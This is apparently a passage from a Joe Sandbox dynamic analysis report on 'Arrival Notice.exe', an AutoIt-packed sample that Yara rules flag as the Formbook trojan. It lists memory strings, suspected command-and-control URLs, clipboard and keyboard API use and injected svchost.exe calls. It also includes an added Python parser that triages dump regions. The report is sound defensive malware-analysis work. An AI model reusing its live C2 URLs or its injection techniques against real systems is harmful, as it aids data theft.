            Source: clip.exe, 00000003.00000003.2041038952.00000000083FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.0000000003BEC000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://dts.gnpge.com
            Source: clip.exe, 00000003.00000003.2041038952.00000000083FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: clip.exe, 00000003.00000003.2041038952.00000000083FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: clip.exe, 00000003.00000003.2041038952.00000000083FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: clip.exe, 00000003.00000002.4134866253.00000000032BF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: clip.exe, 00000003.00000002.4134866253.00000000032BF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: clip.exe, 00000003.00000002.4134866253.00000000032BF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: clip.exe, 00000003.00000002.4134866253.00000000032BF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: clip.exe, 00000003.00000002.4134866253.00000000032BF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: clip.exe, 00000003.00000003.2036941200.00000000083DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
            Source: clip.exe, 00000003.00000002.4136624660.0000000006A48000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.0000000004558000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/icons/cp/64x64/mysql.png
            Source: clip.exe, 00000003.00000002.4136624660.0000000006A48000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.0000000004558000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/gallery.png
            Source: clip.exe, 00000003.00000002.4136624660.0000000006A48000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.0000000004558000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/joomla-2.png
            Source: clip.exe, 00000003.00000002.4136624660.0000000006A48000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.0000000004558000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/mediawiki.png
            Source: clip.exe, 00000003.00000003.2041038952.00000000083FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: clip.exe, 00000003.00000003.2041038952.00000000083FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
            Source: clip.exe, 00000003.00000002.4136624660.0000000005A94000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000035A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2147546281.0000000007C74000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.hprlz.cz/w6qg/?Cj=Qhv8RTO8YPvh6L30&amp;lH=0lpTRQcDUH
            Source: clip.exe, 00000003.00000002.4136624660.0000000005A94000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000035A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2147546281.0000000007C74000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.hprlz.cz/w6qg/?Cj=Qhv8RTO8YPvh6L30&lH=0lpTRQcDUH
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
            Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
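            The rows above mix strings of very different provenance: HTML and asset URLs of the parked domains the sample fetched, search-engine and login.live.com URLs sitting in clip.exe's private read/write memory, and two URLs that appear only in a PAGE_EXECUTE_READWRITE region of the IprrrFQGqOjAyLqOuuogohDyaEetb.exe process. The .sdmp name of each dump encodes where the string was found, so the Python below, an added example and not Joe Sandbox tooling, parses those names and groups the strings by process and by whether the region is executable. The field layout of the .sdmp name is an assumption inferred from the rows in this report and not confirmed by vendor documentation: the fifth field lines up with the Windows PAGE_* protection constants and the seventh with MEM_IMAGE/MEM_MAPPED/MEM_PRIVATE; the remaining fields are left undecoded. The sample rows are copied from the report in the fused form the text export produces; the parser also accepts a " | " separator before the description.

```python
"""Parse Joe Sandbox 'String found in binary or memory' rows and sort the strings by
where in process memory they were found. Added example; not part of the report."""
import re
from collections import defaultdict
from dataclasses import dataclass

# Windows constants (MEMORY_BASIC_INFORMATION.Protect and .Type).
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# ASSUMED layout of a .sdmp name, inferred from the rows in this report and not confirmed
# by vendor documentation:
#   <process index>.<field 2>.<dump id>.<base address>.<protection>.<field 6>.<region type>.<field 8>.sdmp
# Only the two fields whose values line up with the Windows constants above are decoded.
DUMP_RE = re.compile(
    r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})"
    r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)
# Accepts the fused text-export form ("...sdmpString found ...") and a " | " separated form.
ROW_RE = re.compile(r"^\s*Source:\s*(.*?)\s*\|?\s*String found in binary or memory:\s*(\S+)")
SOURCE_RE = re.compile(r"([^,]+?),\s*(\S+\.sdmp)")   # "<process>, <dump name>" pairs

ROWS = [  # copied from the report rows above (fused text-export form)
    "Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut",
    "Source: IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4137645641.000000000564B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dmtxwuatbz.cc",
    "Source: IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4137645641.000000000564B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dmtxwuatbz.cc/lfkn/",
    "Source: clip.exe, 00000003.00000003.2041038952.00000000083FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=",
    "Source: clip.exe, 00000003.00000002.4134866253.00000000032BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033",
    "Source: clip.exe, 00000003.00000002.4136624660.0000000005A94000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000035A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2147546281.0000000007C74000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.hprlz.cz/w6qg/?Cj=Qhv8RTO8YPvh6L30&lH=0lpTRQcDUH",
]


@dataclass(frozen=True)
class DumpRegion:
    process_index: int
    base: int
    protection: str
    region_type: str
    name: str                      # full .sdmp name, to cross-reference the report

    @property
    def executable(self) -> bool:
        return "EXECUTE" in self.protection


def parse_dump_name(name: str) -> DumpRegion:
    m = DUMP_RE.match(name)
    if not m:
        raise ValueError(f"not a .sdmp name: {name!r}")
    prot, typ = int(m.group(5), 16), int(m.group(7), 16)
    return DumpRegion(
        process_index=int(m.group(1), 16),
        base=int(m.group(4), 16),
        protection=PAGE_PROTECTION.get(prot, f"0x{prot:08X}"),   # unknown values stay raw
        region_type=MEM_TYPE.get(typ, f"0x{typ:08X}"),
        name=name,
    )


def parse_row(row: str):
    """One row -> ([(process name, DumpRegion), ...], found string)."""
    m = ROW_RE.match(row)
    if not m:
        raise ValueError("not a 'String found in binary or memory' row")
    sources = [(proc.strip(), parse_dump_name(dump)) for proc, dump in SOURCE_RE.findall(m.group(1))]
    return sources, m.group(2)


def by_process(rows):
    """Process name -> set of strings seen in any of that process's dumped regions."""
    found = defaultdict(set)
    for row in rows:
        sources, s = parse_row(row)
        for proc, _ in sources:
            found[proc].add(s)
    return dict(found)


def strings_in_executable_regions(rows):
    """Strings that sit in an executable region of some process (where unpacked code lives),
    as opposed to only in read/write data such as heap, browser profile or fetched HTML."""
    out = set()
    for row in rows:
        sources, s = parse_row(row)
        if any(region.executable for _, region in sources):
            out.add(s)
    return out


if __name__ == "__main__":
    for proc, strings in sorted(by_process(ROWS).items()):
        print(f"{proc}: {len(strings)} string(s)")
    print("in executable regions:", sorted(strings_in_executable_regions(ROWS)))
```

            Run over the full list of rows above, strings_in_executable_regions() returns only the two www.dmtxwuatbz.cc URLs, because every other string was dumped from a PAGE_READWRITE region; that separation is what an analyst needs before deciding which of the 50-odd URLs deserve a closer look.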
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_0042EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0042EAFF
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_0042ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0042ED6A
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_0041AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0041AA57
            Source: C:\Users\user\Desktop\Arrival Notice.exe | Code function: 0_2_00449576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00449576

            E-Banking Fraud

            Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000001.00000002.1863602986.0000000003680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4134600469.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.4136078962.0000000004A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4136098252.0000000004E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4136001289.0000000003520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1864681477.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1863228024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
Source: 00000001.00000002.1863602986.0000000003680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
Source: 00000003.00000002.4134600469.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
Source: 00000002.00000002.4136078962.0000000004A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
Source: 00000003.00000002.4136098252.0000000004E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
Source: 00000003.00000002.4136001289.0000000003520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
Source: 00000001.00000002.1864681477.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
Source: 00000001.00000002.1863228024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
Source: Arrival Notice.exe, String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Arrival Notice.exe, 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp, String found in binary or memory: This is a third-party compiled AutoIt script. (memstr_ccb4cfd7-6)
            Source: Arrival Notice.exe, 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_1c31a8d2-6
Source: Arrival Notice.exe, String found in binary or memory: This is a third-party compiled AutoIt script. (memstr_f2fe89ab-0)
            Source: Arrival Notice.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_5f596e73-2
Source: initial sample, Static PE information: Filename: Arrival Notice.exe
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_0042AFF3 NtClose
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03872B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03872C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_038735C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03874340 NtSetContextThread
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03874650 NtSuspendThread
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03872B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03872BA0 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03872BE0 NtQueryValueKey
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03872BF0 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03872AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03872AD0 NtReadFile
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03872AF0 NtWriteFile
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03872F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03872FA0 NtQuerySection
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03872FB0 NtResumeThread
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03872FE0 NtCreateFile
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 1_2_03872F30 NtCreateSection
